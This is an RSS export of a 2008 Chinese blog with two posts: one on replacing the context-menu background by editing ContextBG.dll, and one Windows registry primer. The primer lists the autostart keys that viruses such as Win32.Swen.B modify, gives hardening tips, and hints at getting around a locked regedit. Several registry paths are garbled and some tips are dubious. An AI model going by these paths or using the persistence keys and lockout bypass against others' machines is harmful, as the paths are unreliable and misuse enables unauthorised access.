<?xml version="1.0" encoding="GBK" ?>
<rss version="2.0" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:dcterms="http://purl.org/dc/terms/">
 <channel>
  	  <title><![CDATA[Hacker]]></title>
	  <link>http://chaozanbk.blog.163.com</link>
	  <description><![CDATA[文章并非原创 ]]></description>
	  <language>zh-CN</language>
	  <pubDate>Wed, 16 Jul 2008 22:02:19 +0800</pubDate>
	  <lastBuildDate>Wed, 16 Jul 2008 22:02:19 +0800</lastBuildDate>
	  <docs>http://blogs.law.harvard.edu/tech/rss</docs>
	  <generator><![CDATA[NetEase Space]]></generator>
	  <managingEditor><![CDATA[chaozanbk]]></managingEditor>
	  <webMaster><![CDATA[ Hacker]]></webMaster>
		  <ttl>120</ttl>
	  <image>
	  	<title><![CDATA[Hacker]]></title>
	  	<url>http://ava.blog.163.com/photo/KDR6IQy_JQgPeW5o_ITIJw==/175921860444241523.jpg</url>
	  	<link>http://chaozanbk.blog.163.com</link>
	  </image>
  <item>
  	<title><![CDATA[鼠标右键背景画面更换成你喜欢的图片 ]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/5028711120085266590619</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">修改方法： </P>
<P style="TEXT-INDENT: 2em">1.把Resource Hacker V3.4.0 汉化版.rar 和ContextBG.rar下载后解压缩到任意地方。 </P>
<P style="TEXT-INDENT: 2em">2.进入Resource Hacker V3.4.0 汉化版文件夹，运行ResHacker.exe，点击菜单“文件－打开－弹出‘打开包含资源的文件’对话框－定位找到解压后的ContextBG.dll’－双击”。 </P>
<P style="TEXT-INDENT: 2em">3.然后依次展开“Bitmap－129－2057”，注意要用鼠标点中2057才会出现ContextBG.dll里面的美女。 </P>
<P style="TEXT-INDENT: 2em">4.接下来“右击2057－替换资源－弹出‘替换位图于’对话框－点击‘打开新位图文件按钮’－弹出‘打开’对话框－定位找到你喜欢的bmp格式图片（大小任意，最好不要太大，以免右键图片显示不全，但一定要是24位bmp格式位图，最好颜色要浅一些、明亮点的，以免影响右键命令的选择）－双击导入”。</P>
<P style="TEXT-INDENT: 2em">另外一种方法：点击菜单“操作－替换位图－弹出‘替换位图于’对话框－点击‘打开新位图文件按钮’－弹出‘打开’对话框－定位找到你喜欢的bmp格式图片（大小任意）－双击导入” </P>
<P style="TEXT-INDENT: 2em">5.继续点击‘替换位图于’对话框右下角的“替换”按钮。 </P>
<P style="TEXT-INDENT: 2em">6.点击菜单“文件－保存”即可，这时候ContextBG.dll所在的文件夹里面会出现ContextBG_original.dll和ContextBG.dll两个dll文件共存，前者是原有的ContextBG.dll文件，后者是修改后的。 </P>
<P style="TEXT-INDENT: 2em">7.点击“开始－运行”，打开运行对话框，输入：regsvr32 “regsvr32 c:\windows\ContextBG.dll” ，（若不放在C盘windows文件夹下，是放在其它地方，那么在运行regsvr32命令时，如果路径含有空格，要把路径用“”括起来，否则运行命令后会提示“LoadLibrary 失败－找不到指定模块；不含空格时就不要用“”括起来。要输入你的ContextBG.dll文件所在的路径，），确定即可，现在点击右键看看效果吧。 </P>
<P style="TEXT-INDENT: 2em">8.如果想换另一种美女右键，在运行regsvr32完成新美女ContextBG.dll注册后重启系统或者注销一次即可。 </P>
<P style="TEXT-INDENT: 2em">9.如果要恢复系统原来默认右键样式，在regsvr32后面加参数“/u”即可，即“regsvr32 /u c:\windows\ContextBG.dll”。 </P>
<P style="TEXT-INDENT: 2em">注意系统图标（比如我的电脑、各盘符图标）右键里不会调出美女，另外“新建”和“发送到”菜单、winrar的2级菜单也不行，其余都可以，包括2级或3级右键菜单。 </P>
<P style="TEXT-INDENT: 2em">下载后，然后使用上面介绍的方法修改你自己喜欢的图片！最后那个附件是作好的文件，你直接放在C盘windows文件夹里，然后在运行里输入regsvr32 c:\windows\ContextBG.dll就可以了！</P>
<P style="TEXT-INDENT: 2em">使用方法一：把下载后压缩文件解压出来复制到C盘windows文件夹下，然后点击“开始－运行”，打开运行对话框，输入 regsvr32 c:\windows\ContextBG.dll 就可以看到效果了。 </P>
<P style="TEXT-INDENT: 2em">个别看不到效果的注消或重启一次就OK！ </P>
<P style="TEXT-INDENT: 2em">卸载方法：点击“开始－运行”，打开运行对话框，输入 regsvr32 /u c:\windows\ContextBG.dll 即可。 </P>
<P style="TEXT-INDENT: 2em">如果想换另一种右键背景，先卸载现在使用的背景，注消或重启一次。再把新的背景文件复制到C盘windows文件夹下，重新加载一次OK </P>
<P style="TEXT-INDENT: 2em">使用方法二:双击压缩包内的安装文件也可以. </P>
<P style="TEXT-INDENT: 2em">制作方法 </P>
<P style="TEXT-INDENT: 2em">要调节大小的话,可以用ACDSEE 或PS等软件制作合适大小的位图BMP,用资源管理器压缩包内的软件替换即可。 </P>
<P style="TEXT-INDENT: 2em">方法如下 </P>
<P style="TEXT-INDENT: 2em">1.进入Resource Hacker V3.4.0 汉化版文件夹，运行ResHacker.exe，点击菜单“文件－打开ContextBG.dll。 </P>
<P style="TEXT-INDENT: 2em">　 2.然后依次展开“Bitmap－129－2057”，即可看到图 </P>
<P style="TEXT-INDENT: 2em">　　3.接下来“右击2057－替换资源－弹出‘替换位图于’对话框－点击‘打开新位图文件按钮’－弹出‘打开’对话框找到你喜欢的bmp格式图片（大小任意，最好不要太大，以免右键图片显示不全，但一定要是24位bmp格式位图，最好颜色要浅一些、明亮点的，以免影响右键命令的选择）－双击导入”。 </P>
<P style="TEXT-INDENT: 2em">　 4.继续点击‘替换位图于’对话框右下角的“替换”按钮。 </P>
<P style="TEXT-INDENT: 2em">　 5.点击菜单“文件－保存”即可，这时候ContextBG.dll所在的文件夹里面会出现ContextBG_original.dll和ContextBG.dll两个dll文件共存，前者是原有的ContextBG.dll文件，后者是修改后的。把ContextBG.dll这个文件剪切到C：\下 </P>
<P style="TEXT-INDENT: 2em">　 6.点击“开始－运行”，输入：regsvr32 C:\ContextBG.dll ，确定即可，现在点击右键看看效果吧 </P>
<P style="TEXT-INDENT: 2em">　 7.如果想换另一种右键，在运行regsvr32完成新ContextBG.dll注册后重启系统或者注销一次即可。 </P>
<P style="TEXT-INDENT: 2em">　　8.如果要恢复系统原来默认右键样式，在regsvr32后面加参数“/u”即可，即“regsvr32 /u c:\ContextBG.dll”。</P>
<P style="TEXT-INDENT: 2em">效果预览：<A href="http://www.aihuyou.com/attachment/Mon_0605/146_10165_b62613deb0562a6.jpg">http://www.aihuyou.com/attachment/Mon_0605/146_10165_b62613deb0562a6.jpg</A> </P>
<P style="TEXT-INDENT: 2em"><A href="http://pimg.qihoo.com/qhimg/baike/247_434/13/04/94/130494eq117815.fa29d6.jpg"><IMG src="http://pimg.qihoo.com/qhimg/baike/247_434/13/04/94/130494eq117815.fa29d6.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em"><A href="http://pimg.qihoo.com/qhimg/baike/196_331/1e/01/51/1e01510q118904.e3a2e3.jpg"><IMG src="http://pimg.qihoo.com/qhimg/baike/196_331/1e/01/51/1e01510q118904.e3a2e3.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em"><A href="http://pimg.qihoo.com/qhimg/baike/250_377/17/04/b5/1704b51q118443.23b037.jpg"><IMG src="http://pimg.qihoo.com/qhimg/baike/250_377/17/04/b5/1704b51q118443.23b037.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em"><A href="http://pimg.qihoo.com/qhimg/baike/257_373/1e/04/64/1e0464eq117816.a2c30e.jpg"><IMG src="http://pimg.qihoo.com/qhimg/baike/257_373/1e/04/64/1e0464eq117816.a2c30e.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em"><A href="http://pimg.qihoo.com/qhimg/baike/246_418/18/02/44/1802442q11746e.1ee026.jpg"><IMG src="http://pimg.qihoo.com/qhimg/baike/246_418/18/02/44/1802442q11746e.1ee026.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/5028711120085266590619</comments>
    <slash:comments>6</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/5028711120085266590619</guid>
    <pubDate>Thu, 26 Jun 2008 18:59:00 +0800</pubDate>
    <dcterms:modified>2008-06-26T18:59:00+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[电脑的基本常识之注册表]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/50287111200821863159481</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">有人曾经说过，了解了注册表就读懂了WIN系统，这句话是一点都不假的。那么，什么是注册表？注册表有什么功能？如何去修改注册表以达到最佳的效果？又如何来区分注册表里有用和无用甚至是危害的部分呢？</P>
<P style="TEXT-INDENT: 2em">　　什么是注册表？在还是使用Dos和Win3.x操作系统的时代里，大部分的应用程序都采用了ini文件（初始化文件）来保存一些配置信息，如设置路径，环境变量等。system.ini和win.ini控制着所有windows和应用程序的特征和存取方法，它在少数的用户和少数应用程序的环境中工作的很好。随着应用程序的数目的不断增加和复杂性的日益增强，则需要在.ini文件中添加更多的参数项。这样下来，在一个变化的环境中，在应用程序安装到系统中后，每个人都会更改.ini文件。然而，几乎没有一个人在删除应用程序后删除.ini文件中的相关设置，所以system.ini和win.ini这个两个文件会变的越来越大。每次增加的内容会导致系统性能越来越慢，在每次应用程序的升级都出现类似的难题：升级后会增加更多的参数项但是从来不去掉旧的参数设置。而且还有一个明显的问题，一个.ini文件的最大尺寸是64KB。为了能够解决这个问题，软件商自己开始支持自己的.ini文件，然后指向特定的ini文件，这样下来多个.ini文件影响了系统正常的存取级别设置。</P>
<P style="TEXT-INDENT: 2em">　　在windows操作系统序列里，system.ini和win.ini这两个文件包含了操作系统的所有控制功能和应用程序的信息，system.ini管理计算机硬件，win.ini管理桌面和应用程序。所有驱动、字体、设置和参数会保存在.ini文件中，任何新程序都会被记录在.ini文件里。这些记录会在程序代码中被引用。因为受win.ini和system.ini文件大小的限制，程序员添加辅助的.INI文件以用来控制更多的应用程序。举例来说，微软的Word有一个word.ini文件，它包含着选项、设置、缺省参数和其他关系到Word运行正常的信息。在system.ini和win.ini中只需要指出word.ini的路径和文件名即可。</P>
<P style="TEXT-INDENT: 2em">　　为了解决相关的问题，微软公司于1995年正式推出了取代了WIN3.X操作系统的WIN95，从某中程度上来说，WIN95的出现是一个划时代的产物，因为Windows95第一次使用了“注册表”来配置和管理许多即插即用或者必备的硬件，以及临时调用或永久驻留的软件程序。这使得Windows95成为真正意义上的32位操作系统，具有了微机操作系统的五大基本功能。这也使得注册表这个东西第一次出现在了众人的视线中。</P>
<P style="TEXT-INDENT: 2em">　　注册表最初被设计为一个应用程序的数据文件相关参考文件，最后扩展成对32位操作系统和应用程序包括了所有功能下的东西。注册表是一套控制操作系统外表和如何响应外来事件工作的文件。这些“事件”的范围从直接存取一个硬件设备到接口，如何响应特定用户到应用程序如何运行等。注册表因它的目的和性质变的很复杂，它被设计为专门的针对32位应用程序工作，文件的大小被限制在大约40MB。利用一个功能强大的注册表数据库来统一集中地管理系统硬件设施，软件配置等信息，从而方便了管理，增强了系统的稳定性。</P>
<P style="TEXT-INDENT: 2em">　　由此可见，注册表（Registry）是Windows95以上版本操作系统中硬件设备以及客户应用程序得以正常运行和保存设置的核心“数据库”；也可以说是一个非常巨大的树状分层结构的数据库系统。它记录了用户安装在机器上的软件和每个程序的相互关联信息；它包含了计算机的硬件配置，包括自动配置的即插即用的设备和已有的各种设备说明、状态属性以及各种状态信息和数据。</P>
<P style="TEXT-INDENT: 2em">　　好了，说完了注册表和它的发展历程后，我们来关心一下它的功能。注册表的一个好处是添加或删除程序功能，这是开始菜单中控制面板功能的一部分。你安装软件的时候，在注册表中做了一个记录，所以在添加或删除程序中就会作为一个专门列表的一部分出现。注册表保存在你的硬盘的几个文件当中，但访问和修改它们的唯一途径是使用注册表编辑器程序。要访问它，点击开始按钮，然后点击运行。在出现的对话框中输入regedit并按Enter键。这会进入注册表编辑器，你现在就看到了注册表。</P>
<P style="TEXT-INDENT: 2em">　　<A href="http://uimg.qihoo.com/qhimg/quc//314_155/12/01/f5/1201f58qe74f2.ad4bf6.jpg"><IMG src="http://uimg.qihoo.com/qhimg/quc//314_155/12/01/f5/1201f58qe74f2.ad4bf6.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em">　　注册表组织得更像磁盘上的文件，如果你曾经在Windows浏览器中使用过文件夹视图的话，你会根据很熟悉。然而在注册表中，这些文件夹被称为键。要打开某个键，只需点击它旁边的小加号(+)。然后你会看到每个键下包含更多的键，称为子键或值。值是指各种不同键的单独设置，因此是可自定义的。它们在注册表窗口左侧以名称排列，它们还说明了包含数据的类型以及数据本身。不用担心使用的是哪种数据类型，因为这对数据本身是明显的，或者在编辑过程中会作出解释。这些数以千计的键根据逻辑进行排列，在你第一次看到注册表的时候可能会使你感觉无从下手。要把头绪理清楚，首先要知道有五个根键以及注册表的基本组成结构。</P>
<P style="TEXT-INDENT: 2em">　　<A href="http://uimg.qihoo.com/qhimg/quc//275_150/1c/03/24/1c03247qe2630.02f84d.jpg"><IMG src="http://uimg.qihoo.com/qhimg/quc//275_150/1c/03/24/1c03247qe2630.02f84d.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em">　　在这里需要提一下的是，随着使用时间以及大量系统产生的垃圾影响，注册表会变的越来越大，这并不是一个好现象，因为注册表越庞大，你的计算机的运行就会变得越慢，所以很多新手朋友在问到为什么自己的计算机越来越慢的时候，很多情况下就是因为你的注册表内无用垃圾太多，所以导致自己的系统运行越来越缓慢，因此，经常的给注册表“瘦瘦身”是很有必要的。当然，现在很多第三方软件，例如超级兔子、WINDOWS优化大师等系统整理软件都附带了注册表垃圾清除功能，建议新手朋友们务必下一个，经常优化自己的注册表和系统，多研究研究里面的一些配置无论是对计算机的安全和运行都会很有帮助。</P>
<P style="TEXT-INDENT: 2em">　　下面我们就根据图2来逐一解释：</P>
<P style="TEXT-INDENT: 2em">　　<A href="http://uimg.qihoo.com/qhimg/quc//275_150/1c/03/24/1c03247qe2630.02f84d.jpg"><IMG src="http://uimg.qihoo.com/qhimg/quc//275_150/1c/03/24/1c03247qe2630.02f84d.jpg" border=0>600){this.resize=true;this.width = 600;}"&gt;</A></P>
<P style="TEXT-INDENT: 2em">　　在windowsNT/2000/XP中,如果用windows自带的编辑器打开的时候,只能看到五个,还有一个隐藏的根键:HKEY_PERFOR_MANCE_DATA。</P>
<P style="TEXT-INDENT: 2em">　　*HKEY_CLASS_ROOT</P>
<P style="TEXT-INDENT: 2em">　　记录windows操作系统中所有数据文件的格式和关联信息,主要记录不同文件的文件名后缀和与之对应的应用程序其下子键可分为两类:一类是已经注册的各类文件的扩展名,这类子键前面都带有一个".";另一类是各类文件类型有关信息。</P>
<P style="TEXT-INDENT: 2em">　　*HKEY_CURRENT_USER</P>
<P style="TEXT-INDENT: 2em">　　此根根键包含当前登录用户的用户配置文件信息,这些信息保证不同的用户登录计算机时,使用自己的修改化设置,例如自己定义的墙纸,自己的收件箱,自己的安全访问权限。</P>
<P style="TEXT-INDENT: 2em">　　*HKEY_LOCAL_MACHINE</P>
<P style="TEXT-INDENT: 2em">　　此根键包含了当前计算机的配置灵气,包括所安装的硬件以软件设置。这些信息是为所有的用户登录系统服务的。这是事个注册表中最庞大也是最重要的根键!</P>
<P style="TEXT-INDENT: 2em">　　*HKEY_USERS</P>
<P style="TEXT-INDENT: 2em">　　HKEY_USERS根键包括默认用户的信息(DEFAULT子键)和所有以前登陆用户的信息。</P>
<P style="TEXT-INDENT: 2em">　　*HKEY_CURRENT_CONFIG</P>
<P style="TEXT-INDENT: 2em">　　此根键实际上是HKDY_LOCAL_MACHINE/CONFIG/0001分支下的数据完全一样。</P>
<P style="TEXT-INDENT: 2em">　　*HKEY_DYN_DATA根键</P>
<P style="TEXT-INDENT: 2em">　　这个键保存每次系统启动时,创建的系统配置和当前性能信息。这个根键只存在于windows9X中</P>
<P style="TEXT-INDENT: 2em">　　*HKEY_PERFORMANCE_DATA</P>
<P style="TEXT-INDENT: 2em">　　在windowsNT/2000/XP注册表中虽然没有HKEY_DYN_DAT键,但是它却隐藏了一个名为"HKEY_PERFORMANCE_DATA的键。所有系统中的动态信息都是存放在此子键中,系统自带的注册表编辑器无法看到这些键。只可以用专门的程序来查看此键,比如使用性能监视器。</P>
<P style="TEXT-INDENT: 2em">　　下面再谈谈注册表的修改问题。在这里提醒大家一句，如果你没有把握，切记在修改之前，一定要备份注册表。修改注册表，除了用微软自带的编辑器——regedit.exe外，还可以通过第三方软件进行修改，或者利用手工写.reg注册表文件。有没有试过自己写注册表文件？不用任何修改器？直接把写好的注册表文件——.reg倒入注册表？呵呵，这项技巧并不需要每个人都知道了，你只要知道上面的两个就可以了。当然，如果你是电脑迷，我们赞成深入学习。</P>
<P style="TEXT-INDENT: 2em">　　现在我们来看看.reg文件的结构如何。</P>
<P style="TEXT-INDENT: 2em">　　.reg文件的标准格式如下：</P>
<P style="TEXT-INDENT: 2em">　　REGEDIT4</P>
<P style="TEXT-INDENT: 2em">　　[路径]（注意用大小写）</P>
<P style="TEXT-INDENT: 2em">　　"键名"="键值"（针对字符串型键值）</P>
<P style="TEXT-INDENT: 2em">　　"键名"=hex:键值（针对二进制型键值）</P>
<P style="TEXT-INDENT: 2em">　　"键名"=dword:键值（针对DWORD键值）</P>
<P style="TEXT-INDENT: 2em">　　括号里面的内容为本人的注释，写文件的时候就不需要那些小括号了，其他上面所列的都必须包括。注意引号输入时不能用中文输入的引号，必须用英文的引号，否则会出错。</P>
<P style="TEXT-INDENT: 2em">　　那么，怎么写.reg文件呢？我们需要一个文本编辑器，用windows的记事本就可以了。单击鼠标右键，选择新建文本文档，然后在生成的文本文件里输入上面规格的内容就可以了，最后，选择另存为，输入你想要的文件名+.reg保存即可。比如你要生成test.reg,输入test.reg保存即可，你可以看到生成了一个带图标的test.reg.双击运行这个test.reg文件就能相应的修改注册表了，系统会提示“是否导入注册表”之类的信息，确定就可以了。OK,我们可以手动写注册表了。先别急，我们来看看一个标准范例，这是从注册表里面导出来的，大家慢慢学习，跟着模仿一下就能写出自己的.reg文件了。</P>
<P style="TEXT-INDENT: 2em">　　REGEDIT4</P>
<P style="TEXT-INDENT: 2em">　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]</P>
<P style="TEXT-INDENT: 2em">　　"NoRun"=dword:00000000</P>
<P style="TEXT-INDENT: 2em">　　"NoRecentDocsMenu"=hex:01,00,00,00</P>
<P style="TEXT-INDENT: 2em">　　"NoFavoritesMenu"=dword:00000000</P>
<P style="TEXT-INDENT: 2em">　　"user"="sundrink"</P>
<P style="TEXT-INDENT: 2em">　　大家可以看到，dword是16进制，hex是二进制，字符串则可以直接赋值。只要将上面的内容复制保存到文本文档里，然后另存为你想要的.reg文件运行就可以了。呵呵，原来也不是很难嘛，耐心一点就可以了。当然，你要模仿，要自己动手写.reg文件，用记事本就可以了。</P>
<P style="TEXT-INDENT: 2em">　　说多两句，为什么要手写注册表？因为有时候我们会碰到一台锁定regedit的机子，有什么办法解开呢？呵呵，如果你会手写注册表文件的话，那很简单了......大家发挥想象吧!用不了很长时间的。</P>
<P style="TEXT-INDENT: 2em">　　以上的手动修改的方法只针对那些电脑爱者来说的，一般新手朋友最好还是老实的用第三方软件里自带的方法来修改，这样既方便又能看的清楚，不过还是建议大家在修改前一定要做好备份工作。好，关于注册表的修改问题就说到这里了，网上有很多类似的教程，比如提高网速的，优化性能的都有很多，大家可以勤用google搜索一下，自己学习。其实电脑很多东西都是自己摸索出来的，只有自己勤去摸索，你的计算机水平才能得到真正的提高。闲话不再多说，我们继续。</P>
<P style="TEXT-INDENT: 2em">　　现在我们说到了注册表的安全问题。从计算机病毒的发展趋势来看，蠕虫和木马类的病毒越来越多。与普通感染可执行文件的文件型病毒不同，此类程序通常不感染正常的系统文件，而是将自身作为系统的一部分安装到系统中。相对来说，此类病毒的隐蔽性更强一些，更不容易被使用者发觉。但是无论什么样的病毒程序在感染系统时都会留下一些蛛丝马迹。在此我们总结一下各种病毒可能会更改的地方，以便能够更快速地找到它们。</P>
<P style="TEXT-INDENT: 2em">　　一、更改系统的相关配置文件。这种情况主要是针对95/98系统。</P>
<P style="TEXT-INDENT: 2em">　　病毒可能会更改autoexec.bat，只要在其中加入执行病毒程序文件的语句即可在系统启动时自动激活病毒。*更改drive:\windows\win.ini或者system.ini文件。病毒通常会在win.ini的“run=”后面加入病毒自身的文件名，或者在system.ini文件中将“shell=”更改。</P>
<P style="TEXT-INDENT: 2em">　　二、更改注册表健值。</P>
<P style="TEXT-INDENT: 2em">　　目前，只要新出的蠕虫/特洛伊类病毒一般都有修改系统注册表的动作。它们修改的位置一般有以下几个地方：</P>
<P style="TEXT-INDENT: 2em">　　HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\</P>
<P style="TEXT-INDENT: 2em">　　说明：在系统启动时自动执行的程序</P>
<P style="TEXT-INDENT: 2em">　　HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\</P>
<P style="TEXT-INDENT: 2em">　　说明：在系统启动时自动执行的系统服务程序</P>
<P style="TEXT-INDENT: 2em">　　HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</P>
<P style="TEXT-INDENT: 2em">　　说明：在系统启动时自动执行的程序，这是病毒最有可能修改/添加的地方。例如：Win32.Swen.B病毒将增加：HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ucfzyojza="cxsgrhcl.exeautorun"</P>
<P style="TEXT-INDENT: 2em">　　HKEY_CLASSES_ROOT\exefile\shell\open\command</P>
<P style="TEXT-INDENT: 2em">　　说明：此键值能使病毒在用户运行任何EXE程序时被运行，以此类推，..\txtfile\..或者..\comfile\..也可被更改，以便实现病毒自动运行的功能。</P>
<P style="TEXT-INDENT: 2em">　　另外，有些健值还可能被利用来实现比较特别的功能：</P>
<P style="TEXT-INDENT: 2em">　　有些病毒会通过修改下面的键值来阻止用户查看和修改注册表：</P>
<P style="TEXT-INDENT: 2em">　　HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\</P>
<P style="TEXT-INDENT: 2em">　　System\DisableRegistryTools=</P>
<P style="TEXT-INDENT: 2em">　　为了阻止用户利用.REG文件修改注册表键值，以下键值也会被修改来显示一个内存访问错误窗口</P>
<P style="TEXT-INDENT: 2em">　　例如：Win32.Swen.B病毒会将缺省健值修改为：</P>
<P style="TEXT-INDENT: 2em">　　HKCR\regfile\shell\open\command\(Default)="cxsgrhcl.exeshowerror"</P>
<P style="TEXT-INDENT: 2em">　　通过对以上地方的修改，病毒程序主要达到的目的是在系统启动或者程序运行过程中能够自动被执行，已达到自动激活的目的。</P>
<P style="TEXT-INDENT: 2em">　　总结完了各种木马、病毒可能会更改的地方，下面就接着谈防御问题了。当然，在谈之前继续一贯强调的备份注册表，说实话，应对越来越厉害的木马、病毒们，光靠现有的几种办法是远远不够的，备份一个“彻底干净”的注册表就是重中之重。备份的方法依然很多，网上铺天盖地都有，这里也不再多做阐述，google一下就可以了。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:在Windows2000/XP系统中，默认Messenger服务处于启动状态，不怀好意者可通过“netsend”指令向目标计算机发送信息。目标计算机会不时地收到他人发来的骚扰信息，严重影响正常使用。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:首先打开注册表编辑器。对于系统服务来说，我们可以通过注册表中“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices”项下的各个选项来进行管理，其中的每个子键就是系统中对应的“服务”，如“Messenger”服务对应的子键是“Messenger”。我们只要找到Messenger项下的START键值，将该值修改为4即可。这样该服务就会被禁用，用户就再也不会受到“信”骚扰了。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:如果黑客连接到了我们的计算机，而且计算机启用了远程注册表服务(RemoteRegistry)，那么黑客就可远程设置注册表中的服务，因此远程注册表服务需要特别保护。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:我们可将远程注册表服务(RemoteRegistry)的启动方式设置为禁用。不过，黑客在入侵我们的计算机后，仍然可以通过简单的操作将该服务从“禁用”转换为“自动启动”。因此我们有必要将该服务删除。</P>
<P style="TEXT-INDENT: 2em">　　找到注册表中“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices”下的RemoteRegistry项，右键点击该项选择“删除”(图1)，将该项删除后就无法启动该服务了。</P>
<P style="TEXT-INDENT: 2em">　　在删除之前，一定要将该项信息导出并保存。想使用该服务时，只要将已保存的注册表文件导入即可。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:大家都知道在Windows2000/XP/2003中，系统默认开启了一些“共享”，它们是IPC$、c$、d$、e$和admin$。很多黑客和病毒都是通过这个默认共享入侵操作系统的。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:要防范IPC$攻击应该将注册表中“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA”的RestrictAnonymous项设置为“1”，这样就可以禁止IPC$的连接。</P>
<P style="TEXT-INDENT: 2em">　　对于c$、d$和admin$等类型的默认共享则需要在注册表中找到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters”项。如果系统为Windows2000Server或Windows2003，则要在该项中添加键值“AutoShareServer”(类型为“REG_DWORD”，值为“0”)。如果系统为Windows2000PRO，则应在该项中添加键值“AutoShareWks”(类型为“REG_DWORD”，值为“0”)。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:在Windows系统运行出错的时候，系统内部有一个DR.WATSON程序会自动将系统调用的隐私信息保存下来。隐私信息将保存在user.dmp和drwtsn32.log文件中。攻击者可以通过破解这个程序而了解系统的隐私信息。因此我们要阻止该程序将信息泄露出去。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:找到“HKEY_LOACL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionAeDebug”，将AUTO键值设置为0，现在DR.WATSON就不会记录系统运行时的出错信息了。同时，依次点击“DocumentsandSettings→ALLUsers→Documents→drwatson”，找到user.dmp和drwtsn32.log文件并删除。删除这两个文件的目的是将DR.WATSON以前保存的隐私信息删除。</P>
<P style="TEXT-INDENT: 2em">　　提示:如果已经禁止了DR.WATSON程序的运行，则不会找到“drwatson”文件夹以及user.dmp和drwtsn32.log这两个文件。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:不少木马和病毒都是通过在网页中隐藏恶意ActiveX控件的方法来私自运行系统中的程序，从而达到破坏本地系统的目的。为了保证系统安全，我们应该阻止ActiveX控件私自运行程序。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:ActiveX控件是通过调用Windowsscriptinghost组件的方式运行程序的，所以我们可以先删除“system32”目录下的wshom.ocx文件，这样ActiveX控件就不能调用Windowsscriptinghost了。然后，在注册表中找到“HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}”，将该项删除。通过以上操作，ActiveX控件就再也无法私自调用脚本程序了。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:Windows2000的页面交换文件也和上文提到的DR.WATSON程序一样经常成为黑客攻击的对象，因为页面文件有可能泄露一些原本在内存中后来却转到硬盘中的信息。毕竟黑客不太容易查看内存中的信息，而硬盘中的信息则极易被获取。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:找到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSessionManagerMemoryManagement”，将其下的ClearPageFileAtShutdown项目的值设置为1(图2)。</P>
<P style="TEXT-INDENT: 2em">　　这样，每当重新启动后，系统都会将页面文件删除，从而有效防止信息外泄。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:使用Windows系统冲浪时，常会遇到密码信息被系统自动记录的情况，以后重新访问时系统会自动填写密码。这样很容易造成自己的隐私信息外泄。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:在“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpolicies”分支中找到network子项(如果没有可自行添加)，在该子项下建立一个新的双字节值，名称为disablepasswordcaching，并将该值设置为1。重新启动计算机后，操作系统就不会自作聪明地记录密码了。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:现在的病毒很聪明，不像以前只会通过注册表的RUN值或MSCONFIG中的项目进行加载。一些高级病毒会通过系统服务进行加载。那么，我们能不能使病毒或木马没有启动服务的相应权限呢?</P>
<P style="TEXT-INDENT: 2em">　　解决方法:运行“regedt32”指令启用带权限分配功能的注册表编辑器。在注册表中找到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices”分支，接着点击菜单栏中的“安全→权限”，在弹出的Services权限设置窗口中单击“添加”按钮，将Everyone账号导入进来，然后选中“Everyone”账号，将该账号的“读取”权限设置为“允许”，将它的“完全控制”权限取消(图3)。现在任何木马或病毒都无法自行启动系统服务了。当然，该方法只对没有获得管理员权限的病毒和木马有效。</P>
<P style="TEXT-INDENT: 2em">　　安全隐患:很多病毒都是通过注册表中的RUN值进行加载而实现随操作系统的启动而启动的，我们可以按照“禁止病毒启动服务”中介绍的方法将病毒和木马对该键值的修改权限去掉。</P>
<P style="TEXT-INDENT: 2em">　　解决方法:运行“regedt32”指令启动注册表编辑器。找到注册表中的“HKEY_CURRENT_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRUN”分支，将Everyone对该分支的“读取”权限设置为“允许”，取消对“完全控制”权限的选择。这样病毒和木马就无法通过该键值启动自身了。</P>
